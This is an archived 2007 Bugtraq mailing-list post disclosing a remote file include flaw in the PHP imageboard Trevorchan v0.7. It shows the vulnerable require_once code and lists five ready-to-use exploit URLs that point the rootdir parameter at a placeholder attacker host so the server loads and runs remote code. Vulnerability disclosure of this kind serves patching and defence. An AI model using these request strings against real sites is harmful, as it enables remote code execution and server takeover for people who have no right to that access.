Trevorchan <= v0.7 Remote File Include Vulnerability

---

• From: ilkerkandemir@xxxxxxxxx
• Date: 13 Jan 2007 11:33:28 -0000

---

-------------------------------------------------------------------------------------------------------------------

AYYILDIZ.ORG PreSents...



Script:Trevorchan v0.7
Download: http://rel.trevorchan.org/Releasev07.zip

Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>



Code:
require_once($tc_config['rootdir']."/inc/functions.php");
require_once($tc_config['rootdir']."/inc/encryption.php");

-------------------------------------------------------------------------------------------------------------------

Exploit:
upgrade.php?tc_config[rootdir]=http://attacker.txt?
paint_save.php?tc_config[rootdir]=http://attacker.txt?
menu.php?tc_config[rootdir]=http://attacker.txt?
manage.php?tc_config[rootdir]=http://attacker.txt?
banned.php?tc_config[rootdir]=http://attacker.txt?

-------------------------------------------------------------------------------------------------------------------

Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR
Special Tnx: AYYILDIZ.ORG

---

• Follow-Ups:
  • Re: Trevorchan <= v0.7 Remote File Include Vulnerability
    • From: Stefano Zanero

• Prev by Date: RE: seeking comments on disclosure articles
• Next by Date: Ovidentia 5.6x Series Remote File &#304;nclude
• Previous by thread: PHP-Nuke <= 7.9 Old-Articles Block "cat" SQL Injection vulnerability
• Next by thread: Re: Trevorchan <= v0.7 Remote File Include Vulnerability
• Index(es):
  • Date
  • Thread

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint

www.derkeiler.com  > Mailing-Lists  > securityfocus  > bugtraq  > 2007-01